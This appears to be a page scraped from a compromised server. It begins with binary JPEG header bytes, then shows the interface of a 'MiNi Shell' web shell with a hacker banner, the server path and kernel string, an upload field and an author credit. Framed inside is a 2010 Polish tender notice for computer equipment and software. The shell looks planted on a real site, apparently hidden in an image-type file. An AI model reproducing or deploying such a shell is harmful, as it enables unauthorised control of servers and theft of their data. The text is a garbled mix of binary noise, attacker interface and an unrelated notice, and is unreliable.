JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100209/27527-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa sprzętu komputerowego i oprogramowania dla Instytutu Badań Edukacyjnych</b><br>
<b>Numer ogłoszenia: 27527 - 2010; data zamieszczenia: 09.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Badań Edukacyjnych Ministerstwa Edukacji Narodowej , ul. Górczewska 8, 01-180 Warszawa, woj. mazowieckie, tel. 022 6328091, faks 022 6321895.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ibe.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Badawczo Rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego i oprogramowania dla Instytutu Badań Edukacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego, nieużywanego sprzętu komputerowego i oprogramowania:
I.	Drukarki i niszczarki:
1.	Urządzenie wielofunkcyjne I - 4 sztuki. 
2.	Drukarka przenośna - 1 sztuka. 
3.	Urządzenie wielofunkcyjne II - 3 sztuki. 
4.	Urządzenie wielofunkcyjne III - 5 sztuk. 
5.	Niszczarka dokumentów- 2 szt.:
II.	Sprzęt komputerowy
1.	Komputer stacjonarny - 36 sztuk;
2.	Monitor LCD - 40 sztuk;
3.	Laptop I - 1 sztuka; 
4.	Laptop II - 7 sztuk; 
5.	Laptop III - 25 sztuk;
6.	Netbook - 15 sztuk;
III.	Akcesoria i oprogramowanie 
1.	Zestaw do laptopa - 48 sztuk;
1)	Torba:
1.	do laptopa I - 1 sztuka;
2.	do laptopa II - 7 sztuk;
3.	do laptopa III - 25 sztuk;
4.	do netbook-a - 15 sztuk;
2)	myszka USB;
3)	klawiatura USB;
4)	podstawka umożliwiająca regulację kąta nachylenia klawiatury i wysokości ekranu;
2.	Standardowy zestaw oprogramowania - 69 sztuk:
1)	Ms Windows 7 Proffesional w polskiej wersji językowej na licencji edukacyjnej lub równoważny;
2)	Ms Office 2007 Standard na licencji edukacyjnej lub równoważny;
3)	Program antywirusowy.
3.	Zestaw oprogramowania do netbooków - 15 sztuk:
1)	Ms Windows 7 starter lub Ms Windows 7 Proffesional w polskiej wersji językowej  na licencji edukacyjnej lub równoważny;
2)	Ms Office 2007 Standard w polskiej wersji językowej na licencji edukacyjnej lub równoważny;
3)	Program antywirusowy z prawem do aktualizacji na min. 3 lata.
4.	Pendrive I - 80 sztuk. 
5.	Pendrive II  - 5 sztuk. 
6.	Tablet - 1 sztuka. 
7.	Adobe CS4 Master Collection lub równoważny- 1 sztuka; 1 nośnik:
1)	Adobe Photoshop CS4 lub równoważny;
2)	Adobe Illustrator CS4 lub równoważny;
3)	Adobe Dreamweaver CS4 lub równoważny;
4)	Adobe Premiere Pro CS4 lub równoważny.
8.	Dysk zewnętrzny - 10 sztuk. 
9.	Patchcordy - 85 sztuk. 

Szczegółowa specyfikacja techniczna ww sprzętu komputerowego i wyposażenia znajduje się w SIWZ.
ZAKRES GWARANCJI:
1.	Wykonawca gwarantuje najwyższą jakość przedmiotu zamówienia. 
2.	Wykonawca udziela gwarancji na ww sprzęt na okres wskazany w powyższych specyfikacjach technicznych liczony od dnia podpisania protokołu odbioru przedmiotu zamówienia. Wraz z podpisaniem protokołu odbioru, Wykonawca zobowiązany jest wydać sporządzone w języku polskim instrukcje, opisy techniczne, schematy konieczne do prawidłowego korzystania z przedmiotu umowy oraz karty gwarancyjne i dokumenty określające zasady świadczenia usług pogwarancyjnych przez autoryzowane serwisy obsługi. 
3.	Jakakolwiek usterka lub awaria, która nastąpi w okresie gwarancji będzie usunięta przez Wykonawcę bezpłatnie, łącznie z dojazdem serwisu, kosztami transportu do serwisu i do siedziby Zamawiającego oraz kosztami części i robocizny. 
4.	W razie wystąpienia usterki bądź awarii Wykonawca przystąpi do jej usunięcia w siedzibie Zamawiającego w terminie 2 dni od momentu jej zgłoszenia (data i godzina uzgodniona z Zamawiającym) i dokona jej usunięcia w terminie 2 dni roboczych od przystąpienia do prac naprawczych. 
5.	W przypadku gdy w okresie 2 dnia roboczego od momentu zgłoszenia awarii lub usterki nie usunięto uszkodzenia lub naprawa urządzenia wymaga przetransportowania urządzenia z siedziby Zamawiającego, Wykonawca zobowiązany jest nieodpłatnie dostarczyć na czas naprawy urządzenie zastępcze o parametrach technicznych odpowiadających uszkodzonemu urządzeniu.
6.	Gwarancja traci ważność gdy Zamawiający przeprowadzi naprawy lub istotne zmiany w sprzęcie bez zgody Wykonawcy.
7.	Wykonawca nie może odmówić wymiany towaru wadliwego, jeżeli był on już naprawiany lub gdy wada jest tego rodzaju, że nie rokuje doprowadzenia przedmiotu umowy do jakości, jaką powinien mieć przedmiot pozbawiony wad eksploatowany zgodnie z instrukcją obsługi. 
8.	Wykonawca jest zwolniony od odpowiedzialności z tytułu gwarancji jeżeli wykaże, że wady powstały z przyczyn leżących po stronie Zamawiającego, w szczególności z powodu niezgodnego z przeznaczeniem używania rzeczy lub niewłaściwej obsługi. 
9.	W razie zniszczenia lub zgubienia dokumentu gwarancyjnego Zamawiający nie traci uprawnień z tytułu gwarancji, jeżeli wykaże za pomocą innego dowodu, w szczególności - niniejszej umowy, istnienie zobowiązania z tytułu gwarancji. 
10.	Wykonawca zobowiązany będzie do zabezpieczenia w/w warunków gwarancji przez producenta, jeżeli producent wystawi również dokument gwarancyjny. 
11.	Postanowienia powyższe nie uchybiają uprawnieniom Zamawiającego z tytułu rękojmi za wady rzeczy, określonych w Kodeksie Cywilnym. 
12.	Warunki gwarancji określone w niniejszej umowie wraz z przepisami Kodeksu Cywilnego regulują w sposób wyczerpujący prawa i obowiązki Zamawiającego i Wykonawcy. Jakiekolwiek dokumenty gwarancyjne wydane przez Wykonawcę i sprzeczne z warunkami określonymi niniejszą umową albo nakładające na Zamawiającego dalej idące obowiązki niż wynikające z niniejszej umowy nie wiążą Zamawiającego.

ZAMAWIAJĄCY UZNA ZA RÓWNOWAŻNE OPROGRAMOWANIE W ZAKRESIE: 

1.	Systemu operacyjnego, które spełni łącznie następujące warunki:
1.	W zakresie licencji:
1.	licencja uprawniająca do użytkowania wieczystego;
2.	w zakresie funkcjonalności:
1.	pełna obsługa wszystkich podzespołów (kamera, karta sieci bezprzewodowej, itd.) laptopów, netbooków i komputerów stacjonarnych będących składnikiem niniejszego zamówienia;
2.	możliwość natywnego (bez korzystania z emulatorów) uruchomienia pakietu biurowego będącego składnikiem niniejszego zamówienia;
3.	 obsługa szyfrowania wybranych katalogów dysku twardego;
4.	polska wersja językowa.
2.	Pakiet biurowy:
1.	w zakresie licencji:
1.	licencja uprawniająca do wieczystego użytkowania;
2.	możliwość używania wcześniejszych wersji oprogramowania bez ponoszenia dodatkowych opłat.
2.	w zakresie funkcjonalności
1.	pakiet musi składać się z programów:
2.	do edycji tekstu;
3.	arkusza kalkulacyjnego;
4.	do tworzenia prezentacji;
5.	program do obsługi kontaktów.
6.	edytor tekstu powinien umożliwiać zapis i odczyt dokumentów w formatach: rtf, doc, docx oraz odt (dopuszczalne jest wykorzystanie w tym celu wtyczki);
7.	arkusz kalkulacyjny powinien umożliwiać zapis i odczyt dokumentów w formatach: xls, xlsx ods (dopuszczalne jest wykorzystanie w tym celu wtyczki);
8.	program do tworzenia prezentacji powinien umożliwiać zapis i odczyt dokumentów w formatach: ppt, pptx, odp (dopuszczalne jest wykorzystanie w tym celu wtyczki);
9.	wszystkie programy pakietu powinny umożliwiać eksport do formatu pdf;
10.	program do obsługi kontaktów powinien realizować funkcje:
11.	klienta e-mail;
12.	kalendarza z terminarzem;
13.	menadżera kontaktów.
3.	Adobe Photoshop CS4
1.	program musi posiadać funkcje: skalowanie z uwzględnieniem zawartości, auto-mieszanie rozszerzające głębokość pola,  obsługa wideo, analiza obrazów z narzędziami do pomiarów i zliczania, a także obsługa obrazów DICOM i procedur przetwarzania MATLAB, możliwość tworzenia edytowalnych, wtapianych masek z kontrolą gęstości, tworzenie panoram o zakresie 360 stopni, przetwarzanie obrazów typu Raw, tworzenie i udostępnianie harmonijnych zestawów kolorów, obsługa technologii Multi-Touch, edycja projektów 3D, bezpośrednie rysowanie na obiektach 3D, edycja właściwości obiektów 3D (scena, materiały, siatki, światła), renderowanie przy użyciu raytracingu, łączenie obrazów 2D i 3D, animacja obiektów 3D, podgląd i eksportowanie zawartości audio oraz komentarzy do klatek
4.	Adobe Illustrator CS4
1.	program musi posiadać funkcje:  szkicowanie przy użyciu narzędzia, które zamienia pociągnięcia w pojedynczy, wypełniony obiekt. kontrolki ścieżek, style grafiki i edytowanie wyglądu umożliwiające tworzenie rysunków wektorowych; narzędzia ułatwiające konwertowanie fotografii, zeskanowanych obrazów i innych bitmap do ścieżek wektorowych; czcionki OpenTypeR, style akapitu i style znakowe, kompozycje akapitów, podkreślenia i przekreślenia, efekty przezroczystości; edycja gradientów bezpośrednio na obiekcie; funkcje obracania obiektów, dodawania i dostosowywania kolorów oraz tworzenia gradientów eliptycznych; definiowanie przezroczystości poszczególnych znaczników koloru gradientu;
5.	Adobe Dreamweaver CS4
1.	program musi posiadać funkcje:  praca w środowisku rzeczywistym, projektowanie na poziomie pikseli, a także tworzenie kodu; możliwość umieszczania plików FLV na dowolnej stronie internetowej, używając kodowania zgodnego ze standardami. W czasie projektowania możliwość odtwarzania filmów FLV w podglądzie na żywo; integracja z programami graficznymi; natychmiastowe określanie i modyfikacja reguły CSS; kodowanie w językach HTML i JavaScript, środowiskach AJAX (Spry, jQuery, Prototype); dostęp do środowisk JavaScript, takich jak jQuery, Prototype i Spry; obsługa technologii sieci Web, takich jak HTML, XHTML, CSS, XML, JavaScript, AJAX, PHP, ASP
6.	Adobe Premiere Pro CS4
1.	program musi posiadać funkcje: praca w czasie rzeczywistym, narzędzia do edycji plików audio i video, narzędzia do  manipulowania obrazem, dźwiękiem, animacjami i grafiką. Praca z formatami DV, HDV, HD. Odtwarzanie w czasie rzeczywistym wideo z zagnieżdżonymi sekwencjami audio bez konieczności ich renderowania. Eksportowanie materiału na kliszę filmową, na nośniki DVD i Blu-ray oraz do formatu WebDVD.

Wykonawca jest zobowiązany dostarczyć przedmiot zamówienia własnym transportem na własny koszt do siedziby Zamawiającego, po uprzednim uzgodnieniu z pracownikiem Zamawiającego terminu dostawy (data i godzina). Dostawa obejmuje: transport oraz wniesienie sprzętu.

Wykonawca jest zobowiązany do zainstalowania i zarejestrowania pakietów oprogramowania (system operacyjny; pakiet biurowy; program antywirusowy) na każdym komputerze, laptopie, netbooku stanowiącym przedmiot niniejszego postępowania.

Termin wykonania zamówienia: 14 dni od dnia podpisania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.10.00-3, 30.23.21.50-0, 30.21.30.00-5, 30.23.13.00-0, 30.21.31.00-6, 30.23.70.00-9, 48.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany Formularz Oferty (Oferta) sporządzony zgodnie ze wzorem stanowiącym załącznik nr 1 do  SIWZ.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Ofertę podpisuje wyznaczony pełnomocnik.

2.	W przypadku gdy Wykonawca zamierza powierzyć podwykonawcy(om) realizację części zamówienia Zamawiający żąda wskazania (wg wzoru stanowiącego załącznik nr 5 do SIWZ) części zamówienia jakie zostaną powierzone podwykonawcy. 

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zakres udziału podwykonawcy w realizacji zamówienia podpisuje wyznaczony pełnomocnik.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ibe.edu.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Badań Edukacyjnych,
ul. Górczewska 8,
01-180 Warszawa.	
Nr faksu: 022 632 18 95
e-mail: ibe@ibe.edu.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2010 godzina 15:10, miejsce: Oferty winny być złożone w Sekretariacie Instytutu Badań Edukacyjnych, który mieści się w Warszawie (01-180) przy ul. Górczewskiej 8 (pokój nr 79)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Działanie 3.1...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com